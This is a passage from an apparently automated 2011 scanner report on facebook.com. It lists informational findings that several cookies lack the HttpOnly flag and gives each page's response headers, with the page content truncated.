X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.49. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.50. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.51. http://www.facebook.com/fayse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/fayse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.52. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.53. http://www.facebook.com/gale.l.schenk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/gale.l.schenk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.54. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.55. http://www.facebook.com/izaOllie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/izaOllie

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.56. http://www.facebook.com/jezzas previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/jezzas

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.57. http://www.facebook.com/kimberly.christ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/kimberly.christ

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.58. http://www.facebook.com/ladonna.lokey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ladonna.lokey

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.59. http://www.facebook.com/lakendra.roberts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/lakendra.roberts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.60. http://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.61. http://www.facebook.com/matthew.oliveira2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/matthew.oliveira2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.62. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.63. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.64. http://www.facebook.com/patroyo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/patroyo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.65. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.157.53
X-Cnection: close
Date: Thu, 05 May 2011 11:56:56 GMT
Content-Length: 44258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.66. http://www.facebook.com/people/Bucky-Jordan/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=bYeMg; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.67. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.53
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 27769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.68. http://www.facebook.com/robynalys previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/robynalys

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.29
Connection: close
Date: Thu, 05 May 2011 11:42:29 GMT
Content-Length: 47590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.69. http://www.facebook.com/share.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/share.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.111
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.70. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.111
Connection: close
Date: Thu, 05 May 2011 10:56:48 GMT
Content-Length: 10419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.71. http://www.facebook.com/skdarealist previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/skdarealist

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
